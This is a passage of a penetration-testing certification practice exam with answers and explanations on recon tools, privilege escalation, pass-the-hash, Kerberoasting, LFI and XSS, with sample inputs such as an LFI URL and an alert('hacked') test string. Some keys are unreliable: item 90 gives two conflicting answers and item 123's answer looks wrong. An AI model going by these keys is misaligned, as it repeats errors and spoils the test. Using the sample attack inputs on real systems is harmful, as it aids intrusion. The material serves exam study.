B.Burp, SQLmap
C.Sqlmap, Maltego
D.Maltego, SHodan
D.Maltego, Shodan
Explanation:
Maltego is a very powerful tool for collecting reconnaissance data and identfying connections between objects of interest.
Shodan is a search engine, specialized in identifying hardware appliances and servers along with running services and software version.
Shodan is very helpful when performing reconnaissance against internet facing targets
Burp is a local proxy tool, heavily used when performing web pen test.
Sqlmap is a python based tool focused on SQL injection attacks
Aircrack-ng is a tool used for WiFi pentesting
70
```
Similar to scheduled tasks in WIndows, which tool in Linux do attacker often use for persistence?
A.Cron
B.Sudo
C./etc/passwd
D.ifconfig
```
A.Cron
Explanation:
Linux uses cron or cron jobs for scheduled activities.
It is similar to Windows scheduled tasks and could be used in a similar way to establish persistence on a system and survive reboot
71
James has gain user-level access to a Windows server.
What could he try to elevate his access?
A.Look for files containing passwords
B.Look for anonymous users
C.Look for kernel vulnerabilities
D.Look for writable scheduled tasks
D.Look for writable scheduled tasks
Explanation:
In some cases, it may be possible to abuse writable services that run as SYSTEM or elevated privileges.
72
Alex is using an SSH connection a host that she has successfully compromised in the targeted environment.
From within this host, she opens a Firefox browser and accesses an internal website on which she has found an information disclosure vulnerability.
How is Alex able to browse the internal site over SSH?
A.Using a GUI version of SSH for Windows
B.Using X-server forwarding
C.Every SSH service from version 2.0 onward supports graphical interface
D.SSH on Ubuntu Linux supports graphics
B.Using X-server forwarding
Explanation:
X-server forwarding is an SSH configuration element that allows X-server content to be pushed through the SSH connection; for example, browser, calculator and other graphical applications.
X-Server forwarding needs to be enabled in the configuration in order to be used.
Another method of exploiting the internal site through SSH would be to use the SSH connection as a SOCKS proxy, but this would require more in-depth SSH knowledge
73
James is looking at possible software to use to jailbreak an iPhone for a pentest.
His finsihed task should produce a jailbroken iPhone that can be powered off and on without a computer.
```
What type of jailbreak is he searching for?
A.Tethered
B.Semi-untethered
C.Untethered
D.Semi-tethered
```
C.Untethered
Explanation:
With an untethered jailbreak, the device could be powered on and off without the use of a computer
With a tethered jailbreak, a computer and software would be required to boot the jailbroken device each time.
Semi-tethered would mean that if the device was rebooted, a computer would be needed to patch the kernel again and jailbreak the device each time.
A semi-untethered jailbreak would be the same as a semi-tethered, except that it could be accomplished using the jailbreak app that is already on the device and would not require a computer
74
An attacker scans the domain for accounts with SPNs (service principal names) set.
On a compromised machine, the attacker then requests the services to authenticate.
Through specific techniques, password hashes are extracted from the resulting tickets in memory.
Those passwords are later cracked offline.
```
Which attack technique is being used in this scenario?
A.DLL Hijacking
B.Kerberoasting
C.Brute force
D.Kernel exploit
```
B.Kerberoasting
Explanation:
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) tickets for any SPN from a domain controller (DC)
75
```
What can John use to passively search by domain name or IP for exposed systems belonging to an organization?
A.Nmap
B.WHOIS
C.DuckDuckGo
D.Shodan
```
D.Shodan
Explanation:
Shodan is a security search engine for misconfigured or exposed systems
Nmap is a tool for active scanning
WHOIS cannot provide exposed device information
DuckDuckGo is simply a normal search engine, like Google
76
In order to install applications on an iPhone that are not "approved" by Apple, what condition needs to be met?
A.The phone needs to be jailbroken
B.Apple needs to unlock the phone
C.The app needs to have an Apple certificate
D.The app needs to be uploaded on the App Store
A.The phone needs to be jailbroken
Explanation:
Once elevated privileges are obtained through jailbreaking (exploiting a vulnerability that essentially provides root access), unsigned applications can be installed on the device as if they were approved by Apple
77
ON what principle does the mobile application testing framework Drozer work?
A.As audit software running on the mobile device locally and producing a report once it completes its run
B.As scanning software running on a remote host and scanning mobile devices over the Internet
C.As debugging software for offline static application analysis
D.As an agent (server) running on the mobile device and a client with command line interface running on a PC.
D.As an agent (server) running on the mobile device and a client with command line interface running on a PC.
Explanation:
As an agent (server) running on the mobile device and a client with command line interface running on a PC
Drozer consist of an agent, also known as a server, running on the mobile device and a client with command line interface.
Drozer is modular and can be used to text existing exploits
78
```
If Natahn wants to gather email addresses, what is the best strategy to follow?
A.Run John the Ripper
B.Run an Nmap scan with a special script
C.Check WHOIS service
D.Use social engineering
```
D.Use social engineering
Explanation:
Social engineering is the most reliable way to gather data such as email addresses.
WHOIS cannot provide personal email addresses
John The RIpper is a password cracking tool
Nmap has no option for scanning for emails
79
Robert is compiling a penetration test report; has prepared a high-level overview of the results.
```
Which section of the report is suitable for such information?
A.Executive summary
B.Appendix
C.Compliance reporting
D.Technical reporting
```
A.Executive summary
Explanation:
The executive summary is usually in the beginning of the report and summarizes the big picture, methodology used, and a high or critical level findings.
80
```
Which tool can be used for browser exploitation?
A.Burp Suite
B.BeEF
C.EMpire
D.Metasploit
```
B.BeEF
Explanation:
BeEF (browser Exploitation Framework) is a built-on tool in Kali Linux that allows browser manipulation if the victim is hooked
81
Why would an attcker be happy if T telnet traffic was captured during sniffing?
A.Telnet supports pass the hash and could be exploited
B.Telnet is a vulnerable application and any host with a Telnet server is vulnerable
C.Telnet does not enforce encryption and communicate is plaintext
D.Telnet uses weak cryptography and could easily be decrypted
C.Telnet does not enforce encryption and communicate is plaintext
Explanation:
Telnet is a communication application, similar to SSH, but as it is quite old and hasnt been updated for a long time, it is lacking in cryptographic security and all the communication passing through it is in plaintext
82
Which technique is associated with NAC (network access control) bypassing?
A.Setting up the hostname of the attacking machine to match the victims hostname
B.Using Karmateasploit to clone the network
C.Using the "pass the hash" technique
D.Cloning the MAC address of a device that was previously connected to the same network port
D.Cloning the MAC address of a device that was previously connected to the same network port
Explanation:
NAC systems are used to authenticate new devices to the corporate network.
Some NAC systems, however, can be tricked by simple actions like cloning the MAC address of an already authenticated host, or setting up a static IP matching the authenticated host
83
During reconnaissance you decided to use the following plugin/module to collect emails from a host:
"auxiliary/gather/search_email_collector"
```
Which tool are you using?
A.Nmap
B.ZAP
C.Metasploit
D.Burp
```
C.Metasploit
Explanation:
Metasploit is a powerful framework and consist of multiple modules.
Auxiliary modules are usually scanners or other reconnaissance tools.
This module uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain and is useful in automated information gathering during a penetration test
84
You are hiring an external pentesting company to conduct a pentest.
You are concerned that in case of successful exploitation, they will gain access to internal information that should be considered confidential.
What can you do to make sure that the pentest company does not disclose this information?
A.Ask the pentesting company to not share information if obtained
B.Ask the pentesting company to sign an NDA
C.Hide this information from your servers
D.ENcrypt the data, so that even if hacked, it will not be readable
B.Ask the pentesting company to sign an NDA
Explanation:
A non-disclosure agreement (NDA) is an agreement that legally obliges the parties involved to not disclose any information obtained during the pentest
85
Alex would like to include her notes in the pentest report.
The notes are long text files that would unnecessarily increase the size of the report.
What would be the best way to include them?
A.The notes are not necessary; do not add them
B.Regardless of the length, add them at the end of the report
C.Share the notes separately
D.Add them as an object in a Word version of the report
D.Add them as an object in a Word version of the report
Explanation:
The conclusion of a pentest report may include an appendix, which references artifacts that are associated with the pentest activities, including scan data, notes, etc.
These artifacts can be inserted as objects in a pentest report formatted in Mircrosoft Windows
86
Which of the following statements is true regarding the difference between a dictionary attack and a brute force attack?
A.A dictionary attack is only possible against wireless networks, while a brute-force attack applies to all passwords
B.A dictionary attack utilizes a dictionary of words as a possible password, while a brute-force attacks test all possible combinations defined in the setup
C.A dictionary attack only targets Window servers, while brute force attacks only targets websites
D.There is no difference between a dictionary attack and a brute-force attack
B.A dictionary attack utilizes a dictionary of words as a possible password, while a brute-force attacks test all possible combinations defined in the setup
Explanation:
A dictionary attack utilizes a dictionary of words as a possible password, while a brute-force attack tests all possible combinations defined in the setup
87
On an open relay SMTP server, how would the VRFY command be used to aid an attack?
A.The VRFY command could be used for user enumeration
B.The VRFY command could be used in password-guessing attacks
C.The VRFY command could be exploited for privilege escalation
D.The VRFY command could be used to sign emails with company certificates
A.The VRFY command could be used for user enumeration
Explanation:
After you connect with Netcat or Telnet, issue the VRFY or EXPN command using an internal email address is an attempt to enumerate local or domain users in the environmet.
For example, VRFY root.
If the VRFY command is enabled on the relay server and the account doesnt exist, you will receive an error message
88
You are preparing the recommendations section of the pentest report.
You need to address the weak cryptographic security of the LM hash-stored password.
```
What is this recommendation focused on?
A.Process
B.Technology
C.Management
D.People
```
B.Technology
Explanation:
In this situation, simple technology improvement could resolve the vulnerability and completely remove the risk
..
Migration to more secure password hashing functions would be mandatory
89
Penetration testing includes a lot of technical work and generates a lot of log data.
Scan results are sometimes several pages long.
Alex wants to include all this information in the report but is afriad that if she puts it in the technical section, the report will be much too long, which is not ideal.
Which will resolve this issue?
A.Do not include these results
B.Archive these results and provide them separately
C.Regardless of formatting and report size, all these results should be part of the technical section
D.Reference the results in an appendix in the conclusion section
D.Reference the results in an appendix in the conclusion section
Explanation:
It is a good practice to keep the report clean and tidy with only relevant information in it.
However, it is also good to practice to provide all secondary information related to the test in an appendix for detailed technical review
90
What tool can be used to manage administrative credentials for organizations and store passwords in Active Directory, where they may be directly tied to computer accounts?
A.Microsoft's Local Administrator Password Solution
B.Microsoft's Password Vault Solution
C.Microsoft's Admin Password Register
D.Microsoft's Administrator Password Directory
D.Microsoft's Administrator Password Directory
A.Microsoft's Local Administrator Password Solution
Explanation:
Microsoft's Local Administrator Password Solution (LAPS) is a tool that manages administrative credentials for organizations.
It stores and manages passwords in Active Directory, where they may be directly tied to computer accounts
91
```
Which of the following does not belong in the pentest scoping documentation?
A.User emails and usernames
B.Stakeholders
C.Domains
D.IP Addresses
```
B.Stakeholders
Explanation:
Stakeholders are among the targeted audience when preparing a pentest report
The stakeholders are information consumers, not just escalation points.
Each group will have a different understanding and expectation of the process.
Since the stakeholders group is not made up of technically oriented individuals, they should not be taking part in the scoping process
92
```
Which command is used for a stealth scan?
A.Nmap -sS
B.Nmap -P
C.Nmap --stealth
D.Nmap --scan --quiet
```
A.Nmap -sS
Explanation:
The Nmap -sS command will initiate a "syn scan" which is also called a stealth scan due to the nature of the packets being sent
93
John works in the IT department of a big company.
John has access to the file server used by the HR department and has installed a backdoor in order to access the server remotely from his home.
He has been downloading sensitive documents from this server to his personal machine for weeks,
What kind of a threat actor is John?
A.John is a script kiddie
B.John acts as an APT attacker
C.John is an insider threat
D.John is a hacktivist
C.John is an insider threat
Explanation:
Being part of the organization and possessing internal knowledge, John is in the position of an insider or also known as insider threat.
Insider threats are very common and are considered high risk.
94
Nathan wants to create a topology for scanned networks.
Is there a way he can generate one automatically?
A.Yes using Zenmap
B.No, a topology cannot be made automatically
C.Yes, using OWASP ZAP
D.Yes, using theHarvester
A.Yes using Zenmap
Explanation:
Zenmap (NMAP GUI) build an automatic topology upon scanning targets
OWASP ZAP is a web application scanner proxy software
theHarvester is an OSINT tool for collecting emails and other information
95
George is in the middle of a pentest.
His tactic is to show up at the clients office and pretend to be the new security officer.
Using the leverage of the SO position, he will try to gather information about security policies and practices in the company.
```
What type of attack is George attempting?
A.Elicitation
B.Spear Phishing
C.Impersonation
D.Dumpster Diving
```
C.Impersonation
Explanation:
Impersonation (regardless of whether the individual is an officer of the law) can be a criminal offense and is governed by state law.
The criminality of impersonation varies and may taker the form of assuming false identity with the intent to defraud another, pretending to be another person or organization, or opening bank and credit accounts under someone else name, otherwise known as identity theft
96
```
When analyzing traffic captured between you and a targeted host, which tool would you most likely use for the packet inspection?
A.Hping
B.dnssniff
C.Metasploit
D.Wireshark
```
D.Wireshark
Explanation:
Wireshark is a very powerful tool for analyzing and inspecting network traffic and packet captures.
It has extensive GUI interfaces rich with features
97
John is in the information-gathering stage of his pentest.
He hears two of the developers talking about a recently changed password for the databases,
```
What method is he using at the moment?
A.Eavesdropping
B.Enumerating
C.Spear Phishing
D.Social Engineering
```
A.Eavesdropping
Explanation:
Eavesdropping is a passive form of information gathering, because John simply hears them talking about it and doesnt have to do anything else to get this information
98
During a MiTM attack, Dennis collected some NTLM hashes.
Which of the following could those hashes be useful for?
A.Password hashes for wifi networks,
B.Nothing, as NTLM hashes are useless
C.In an authentication session agaisnt the Web Database
D.A tool like Metasploit, Medusa, or Hydra in a pass the hash attack
D.A tool like Metasploit, Medusa, or Hydra in a pass the hash attack
Explanation:
In a Windows network, NT LAN MAnager (NTLM) is a suite of Microsooft security protocols.
It was the feault for network authentication in the Windows NT 4.0 OS that provides authentication, integrity and confidentiality to users.
The NTLMv2 is the latest version and uses the NT MD4 based one-way function.
The hash lengths are 128 bits and work for a local account and Domain account
The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller) and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password
Pass The Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a users password, instead of requiring the associated plaintext password as is normally the case.
99
The group of stakeholders usually involved in the pentest discussions include executive management, security personnel, it IT department pentesters and:
A.A company sales representative
B.The legal department
C.A Microsoft representative
D.A local law enforcement representative
B.The legal department
Explanation:
Legal representatives may be necessary to ensure that legal and contractual commitments are upheld by all parties involved in the engagement.
The group of stakeholders usually involved in the pentester discussions includes executive management, security personnel, it IT department, pentesters, and the legal department
100
```
What tool could you use to gain access to the SAM database on a Windows host?
A.WinDbg
B.NC
C.Mimikatz
D.Recon-ng
```
C.Mimikatz
Explanation:
Mimikatz is a post-exploitation tool used for obtaining plain text user accounts and passwords
101
James believe that there are folders accessible by the web server he is currently testing that would be considered interesting and might hold valuable information.
```
Which tool could help him automate the process of looking for "sensitive" folders on a web server?
A.DirDetector
B.DirBuster
C.FolderFinder
D.Directory Traverser
```
B.DirBuster
Explanation:
A popular tool for this purpose is DirBuster which is a Java-based framework.
DirBuster is included in Kali Linux, which also provides a common wordlist found in /usr/share/dirbuster/wordlists
102
When Geroge gains access to a vulnerable Linux host, he finds that the machine has already been comrpomised.
One of the clues is a cron job obviously used for persistence.
What should George do in this situation?
A.Remove the cron job and proceed with testing
B.Only mention in the final report
C.Start the process of deconfliction
D.Ignore the cron job and proceed with testing
C.Start the process of deconfliction
Explanation:
Communication with the customer provides the ability for deconflicition, which is the process of sorting out your pentest artifacts from the artifacts of a real compromise, for example
103
Social networking sites are a good source of:
A.Potential Insiders
B.Account Information
C.Exploit information
D.Network targets
B.Account Information
Explanation:
Social media enumeration focuses on identifying all of an individuals or organizations social media accounts.
This would include LinkedIn, Facebook, Twitter and so on.
The information shared on those platforms could potentially aid the attacker in a social engineering attack in the future.
104
```
Which of the following is not essential, but would improve the speed and accuracy of a pentest?
A.Nessus license
B.More than one Nessus instance
C.Sample application requests
D.Testing environment
```
C.Sample application requests
Explanation:
Having a list of sample APLI calls would help you no to miss any possible parameter you could test and also would help identify the boundaries of a proper request, which could later be exploited .
105
```
What tool would you use if you want to extract metadata from a image file?
A.Nmap
B.ExifTool
C.ZAP
D.cat
```
B.ExifTool
Explanation:
ExifTool is a free and open-source software program for reading, writing and manipulating image, audio, video and PDF metadata.
This data might provide additional useful information, for example location
106
Why would Geroge choose Evil Twink for the Wi-Fi attack he attempts, if his goal is to gather credentials from the victims?
A.Evil Twin can be used against multiple victims and APs simultaneously
B.Evil Twin does not require a root
C.Evil Twink has better performance
D.Evil Twin can be used for a downgrade attack
D.Evil Twin can be used for a downgrade attack
Explanation:
Evil Twin can also be used for a downgrade attack, which tricks clients into using a less secure protocol or encryption scheme.
Once George has successfully conducted a MiTM attack,m he can also work on credential harvesting by capturing unencrypted traffic between the client and remote systems and services
107
A ping sweep is a basic network scanning technique used to determine which of a range of IP addresses map to live hosts.
```
Which of the following tools could you use for a ping sweep?
A.Nmap
B.nc
C.Telnet
D.Tracert
```
A.Nmap
Explanation:
A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to determine which of a range of IP addresses map to live hosts.
Whereas a single ping will tell you whether one specified host computer exists on the network, a ping sweep consist of ICMP ECHO requests sent to multiple hosts.
If a given address is live, it will return an ICMP ECHO reply.
Ping sweeps are among the older and slower methods used to scan a network
There are a number of tools that can be sued to do a ping sweep, such as fping, gping and nmap for UNIX systems, and the Pinger software from Rhino9 and Ping Sweep from SolarWinds for Windows systems.
Both Pinger and Ping Sweep send multiple packets at the same time and allow the user to resolve host names and save output to a file
You can use Nmap for quick ping sweep of a local network.
For example: Nmap -vv -n -sn 192.168.0.0/24 -oA pingscan.out
108
Phishing can potentially cause a lot of damage.
Sometimes mail spam filters and other security measures are a step behind the new phishing trends.
What is another very effective way to prevent ow lower the success rate of phishing attacks?
A.Hiding email addresses from public records
B.Phishing filters on IDS and IPS
C.Disabling mail service
D.Employee security awareness training
D.Employee security awareness training
Explanation:
Regular security awareness training could help the employees properly identify phishing emails
A social engineering test can provide information about employee behavior, policy compliance and enforcement, and security awareness in addition to the information and access that it may provide through an organizations security boundaries.
If employees are well trained to recognize malicious emails, this information could be protected
109
What type of an attack is being attempted with the following request?
'https://example.com/app.php?file=C:\\temp\\attack.exe'
.Directory traversal
B.Remote File Inclusion (RFI)
C.Local File Inclusion (LFI)
D.SQL Injection
C.Local File Inclusion (LFI)
Explanation:
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server.
An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS)
Typically, LFI occurs when an application uses the path to a file as input.
If the application treats this input as trusted, a local file may be used in the include statement.
Local File Inclusion is very similar to Remote File Inclusion (RFI).
However an attacker using LFI may only include local files (not remote files like in the case of RFI)
Remote File Inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.
The perpetrators goal is to exploit the referencing function in an application to upload malware from a remote URL located within a different domain.
The consequences of a successful RFI attack incluide information theft, compromised servers and a site take over that allows for content modification
110
```
In what type of exploitation method is the hacker competing against other DNS servers in responding to a DNS query?
A.Phishing attack
B.Denial of Service Attack
C.DNS Cache Poisoning Attack
D.ARP Spoofing Attack
```
C.DNS Cache Poisoning Attack
Explanation:
In a DNS cache poisoning attack, the victim sends a DNS query to the respective DNS server.
If the server does not know the answer, the query is then forwarded to its parent DNS server.
If the hacker manages to respond to the query before the genuine, authoritative answer arrives, he can provide his own host information and potentially poison the DNS cache of the server with a malicious response
111
With a given scope of IP addresses, how can John identify live hosts?
A.By using port scanners
B.By exploiting directory traversal vulnerability
C.By implementing a honeypot
D.By using Burp Suite
A.By using port scanners
Explanation:
Port scanners are tools that generate traffic and can enumerate hosts, ports and services
Burp Suite cannot perform host scanning
Directory traversal has nothing to do with identifying live hosts
A honeypot is used as a method of defense against hackers
112
While pentesting for a client, George notices that one of the vulnerability scanning tools could be fine-tuned to produce more comprehensive results.
As what stage of the pentest should George share his ideas?
A.Post-engagement cleanup
B.Follow-up actions and retesting
C.Before the next pentest
D.Lessons learned
D.Lessons learned
Explanation:
The lessons learned section is an internal session between the pentesting team members that is held after the successful completion of a pentest.
In this session the team usually discusses the future methods and ways to improve the testing service they provide
113
How do you maintain situation awareness during a penetration test?
A.Constantly scan targets for changes
B.Monitor the environment for drastic changes
C.Hold regular meetings with the client
D.Occasionally send queries to the client representatives
C.Hold regular meetings with the client
Explanation:
The reason for holding regular meetings with the client is to maintain situation awareness and be able to respond to any necessary changes in the client environment
114
Should observations like those below be part of the pentest report?
"During code analysis it become evident that the developers are following best security standards in regard to character sanitization."
Vulnerability scanners did not reveal any obsolete or out-of-date software or services in the environment, thus suggesting regular security patching.
This suggests that the delivery teams are following best security practices."
A.Yes because they could reassure management
B.No, observations like these are only shared internally with the pentest team
C.No, they should not be part of the official report
D.No, because they are only the pentesters personal notes
A.Yes because they could reassure management
Explanation:
Providing some general observations you made during the pentest can help senior management know some things concerning the culture of the organization that they may not already know
115
During the enumeration phase, Alex is attempting to build a topology map of the network environment.
```
What tool would produce fairly accurate results?
A.Zenmap
B.Burp Suite
C.Recon-ng
D.ZAP
```
A.Zenmap
Explanation:
Zenmap GUI is a graphical Nmap tool with some neat features under the hood, one of which is creating topology map of the network it scans.
This can be very useful when planning attacks
116
You have successfully gained access to a Windows machine, and during your attack you made some changes on the disk.
Files were modified.
```
What technique could you use to evade possible detection based on the file manipulation?
A.Shell
B.Idletime
C.Karmetasploit
D.Timestomp
```
D.Timestomp
Explanation:
Timestoping is used to modify the timestamps of files on the disk.
Idletime will display the number of seconds that the user at the remote machine has been idle
Shell will drop your session to OS shell
Karmetasploit allows you to fake access points, capture passwords, harvest data and conduct browser attacks against clients
117
Jack is conducting a pentest and has identified a critical vulnerability on one of the clients server.
The server admin is interested in any results about "his" server.
How should Jack communicate this finding?
A.Jack should communicate directly with the contact person appointed in the contract
B.Jack should not communicate the issue to anyone until the final report is ready
C.Jack can share the finding with the admin unless it is explicitly forbidden in the contract
D.Jack should share his findings with the admin and help him mitigate the issue
A.Jack should communicate directly with the contact person appointed in the contract
Explanation:
A clear communication path should be predefined and strictly followed by the penetration tester.
Upon discovering a critical vulnerability, it is a good practice to report it in a timely manner.
The information should not be shared with the admin unless this is explicitly allowed in the contract
118
```
On a Linux machine, which command would show the current version of the OS and kernel information?
A.who
B.lsb_release -a
C.whoami
D.sysinfo
```
B.lsb_release -a
Explanation:
"lsb_release" command with -a parameter would likely show the current release and kernel version.
Another helpful command that would show detailed kernel information is "uname -a"
119
James has found the public IP of the clients AP router.
The device has a managing web interface and James is able to log in using the following credentials:
Admin:Admin
```
What sort of exploitation technique has James used?
A.Credential harvesting
B.Default credentials
C.Brute-force
D.Session hijacking
```
B.Default credentials
Explanation:
Some systems run web-based applications and are configured with default credentials, which make them easy targets for attacks.
A pentesters approach to accessing these devices over the network should be similar to the approach taken against a corporate IT system
120
George has provided the pentest report for a web application he has tested.
His scope was limited to the front end of the application.
Upon completion of the engagement, the client requests that George do a free retest and include in it the back end of the application as well as the actual hosting server.
What should George do?
A.A free retest is a common request, but it should be considered a new engagement and charged for
B.A free retest is considered the gold standard and should be conducted unless specifically excluded in the SOW
C.Retest is common for a pentest engagement and is usually free of charge and done in a shorter time span
D.There is no business justification for a free retest so he should decline the request
A.A free retest is a common request, but it should be considered a new engagement and charged for
Explanation:
Retest is a common request with pentests.
However, if the scope of the restest is larger or different than the scope of the test, it should be considered a new engagement and should be charged for
The nature of follow-up actions varies, and testers should make a judgement call about the level of formality involved.
If the client is request a quick retest that falls within the original scope of work and rules of engagement, the testers may choose to simply conduct the retest at no charge.
If, however, the client is requesting significant work or changes to the scope or rules of engagement, the testers may ask the client to go through a new planning process
121
You are performing a pentest, but you need to hide the origin of your connection, as you are carrying out a red team engagement.
```
What tool can you use to hide your original IP?
A.Proxychains
B.There is no way to hide your IP
C.Incognito browser
D.Virtual machine on your host
```
A.Proxychains
Explanation:
As you send traffic to and from systems during a pentest, you will likely want to hide the content of the traffic you are sending,.
You can use proxychains to tunnel any traffic through a proxy server, with full support for HTTP, SOCKS$ and SOCKS5 proxy servers and with the ability to chain multiple proxies together to further conceal your actions
122
What is James attempting to do when he uses a spider tool against a website?
A.Perform SSL downgrading
B.Generate a word list for future password cracking
C.Scan for vulnerabilities
D.Perform an XSS attack
B.Generate a word list for future password cracking
Explanation:
Spiders are used to browse a given URL and return a word list that can be sued with either password crackers (like John the Ripper) or brute force login tools (like Hydra)
123
James has gained access to the clients internal network.
His reconnaissance discovered an internal employee web portal used for administrative tasks, such as vacation request, HR tickets and so on.
This portal requires login and uses the domain login of the employee.
Jame's plan is to mimic the login page and lure the employees to his malicious site, where their credentials will be recorded.
```
What technique would James use?
A.Elicitation
B.SSL Stripping
C.Pass the Hash
D.DNS Cache Poisoning
```
D.DNS Cache Poisoning
Explanation:
The DNS resolver cache is overwritten on the DNS server with a malicious web address and the user will be directed to the malicious site instead of the intended one
124
```
Which document is part of the pentest documentation and describes the prices of the pentest?
A.NDA
B.SOW
C.RoE
D.Scope
```
B.SOW
Explanation:
The SOW is a document that defines what deliverables will be created, the timeline for the work to be completed, the price of the work and any additional terms and conditions
125
Which of the following methods is a dictionary attack?
A.Using Burp Suites Intruder to brute-force a login page of a website
B.Putting a passwords hash through Hashcat
C.Using Nmap's port scan on a domain
D.Using Netcat to connect to a victims machine
A.Using Burp Suites Intruder to brute-force a login page of a website
Explanation:
In a dictionary attack, the attacker uses a dictionary (list) of common words and phrases that are often used as passwords.
Then a tool, such as Burp Suite Intruder, iterates through the list and attempts to authenticate against the login mechanism
126
During information-gathering, John wants to enumerate the operating systems of the live hosts.
What is this process called?
A.The operating system cannot be identified
B.Operating system scanning
C.Operating system listing
D.Operating system fingerprinting
D.Operating system fingerprinting
Explanation:
OS scanning is the wrong term, because the OS cannot be scanned; the way a PC behaves determines which OS it is using.
While probing different servcies and ports, the scanner is matching the response against a predefined table of responses.
Based on the results, the OS is determined
OS listing is a term used when working with asset management tools
127
Jame's client is legally obligated to prevent their R&D data from leaving the country.
What sort of restriction is this?
A.Corporate policy restriction
B.Compliance-based restriction
C.Governmental restriction
D.Network restriction
C.Governmental restriction
Explanation:
Export restrictions are governmental rules prohibiting the export of certain goods and services to other countries.
US export laws prohibit the export of certain encryption technology
128
```
Which of the following is a software testing technique that inputs invalid or random data into the software system to discover coding errors and security loopholes?
A.Code Review
B.Brute-forcing
C.Pass the hash
D.Fuzzing
```
D.Fuzzing
```
Explanation:
Fuzz testing (fuzzing) is a software testing technique that inputs invalid or random data called fuzz into the software system to discover coding errors and security loopholes. Data is inputted using automated or semi-automated testing techniques after which the system is monitored for various exceptions, such as crashing down of the system or failing built-in code, etc. The goal of fuzzing is to detect validation logic, memory leaks, or error handling.
```
A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.
Pass the hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case.
Code review is a software quality assurance activity in which one or several people check a program mainly by viewing and reading parts of its source code, and they do so after implementation or as an interruption of implementation. At least one of the persons must not be the code's author.
129
What could Alex add to the remediation section of her pentest report to make it more professional and informative?
A.Screenshots of the remediation actions
B.CVSS score for remediation actions
C.References to online articles and databases
D.Risk rating changes based on remediation actions
C.References to online articles and databases
Explanation:
References to online articles or CWE or CVE databases and other online sources of vulnerability information, would help the client understand the impact as well as the method of remediating it
130
```
Of the following, which is a way to fingeprint a web server?
A.Use dig against the domain
B.Read the HTTP response header
C.Ping the server
D.Use nslookup against the domain
```
B.Read the HTTP response header
Explanation:
A simple netcat (nc) request over port 80 or 443 will return an HTTP response header.
This header usually contains the web server version
131
```
When gathering information about a specific domain, which two tools would a penetration tester use?
A.theharvester, nslookup
B.nslookup, msfconole
C.theharvester, msfconsole
D.nslookup[, CeWL
```
A.theharvester, nslookup
Explanation:
theHarvester and nslookup are two easy to use and very helpful tools used to interrogate DNS servers.
theHarvester is a tool for gathering email accounts, subdomain names, virtual hosts, open ports/ banners, and employee names from different public sources (search engines, pgp key servers).
nslookup is a network administration command-line tool available in many computer operating systems for querying the Domain Name System to obtain domain name or IP address mapping, or other DNS records. The name "nslookup" means "name server lookup".
The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF.
CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers.
132
Which option best matches the following description?
An exploit or a script created in order to successfully exploit a service or a software
Usually this exploit or script is created by a security researched during product testing phase.
In most cases, such as exploits or scripts are available online and can be used in pentests
A.Pentest SOW
B.Proof of concept (POC)
C. Assessment technique
D.DoS (Denial of Service)
B.Proof of concept (POC)
Explanation:
POC, or proof of concept is usually a script or a piece of code that is created solely for exploiting a targeted service or software.
Such POCs can be found in exploitdb, for example
133
What is the difference between DOM_based XSS and stored or reflected XSS?
A.Stored and reflected XSS are associated with HTML; DOM-based XSS is associated with PHP
B.DOM-based XSS is exploitable only on Apache servers
C.DOM-based XSS uses jQuery; stored and reflected XSS use JavaScript
D.DOM-based XSS is executed directly in the browser; reflected or stored XSS is passed back to the server
D.DOM-based XSS is executed directly in the browser; reflected or stored XSS is passed back to the server
Explanation:
The document object model (DOM) is passed down to the browser from the application during runtime and is used for structuring content.
Unlike with stored or reflected XSS attacks that get passed back to the server, the execution happens directly in the users browser, since not every object is treated as a query by the browser.
This can make the detection process even more difficult if the logging only occurs on the client side
134
While penetration testibg a website, Alex is writing the following at the end of the comment he wrote:
'alert('hacked')'
What kind of vulnerability is Alex testing for?
A.Stored cross-site scripting (Stored XSS)
B.Reflected cross-site scripting (Reflected XXS)
C.SQL Injection
D.Code injection
A.Stored cross-site scripting (Stored XSS)
Explanation:
Cross-site scripting attacks can be broken down into two types: stored and reflected.
Stored XSS, also known as persistent XSS, is the more damaging of the two.
It occurs when a malicious script is injected directly into a vulnerable web application.
To successfully execute a stored XSS attack, an attacker has to locate a vulnerability in a web application and then inject malicious script into its server. One of the most frequent targets are websites that allow users to share content, including blogs, social networks, video sharing platforms and message boards. Every time the infected page is viewed, the malicious script is transmitted to the victims browser
In the example. Alex would also store the script "alert(hacked)"
If vulnerable, the script would be executed every time the page is loaded.
This applies to all user that would open the page.
Reflected XSS involves the reflecting of a malicious script off of a web application onto a users browser.
The script is embedded into a link, and is only activated once that link is clicked on
Code Injection is the exploitation of a computer bug that is caused by processing invalid data. Injection is used by an attacker to introduce (or "inject") code into a vulnerable computer program and change the course of execution
SQL Injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database
135
You are preparing your pentest Kali Linux machine.
The scope of the pentest also includes wireless networks, so you consider buying an external WiFi antenna.
```
Which of the following chipsets are popular and known to be compatible with Kali Linux?
A.Intel Wireless Solution
B.Broadcom
C.Asus WiFi
D.Atheros AR921
```
D.Atheros AR921
Explanation:
It has been verified many tiumes that Kali Linux works best with chipsets of Aetheros and Ralink.
There are native drivers in Kali that support this hardware are proven to work flawlessly
136
```
Which tool might you consider using as an alternative to Patator?
A.WinDbg
B.Nmap
C.Medusa
D.Recon-ng
```
C.Medusa
Explanation:
Patator is a less user-friendly tool used for brute-forcing.
It provides functionality similar to that of Hydra and Medusa, but with a different approach
137
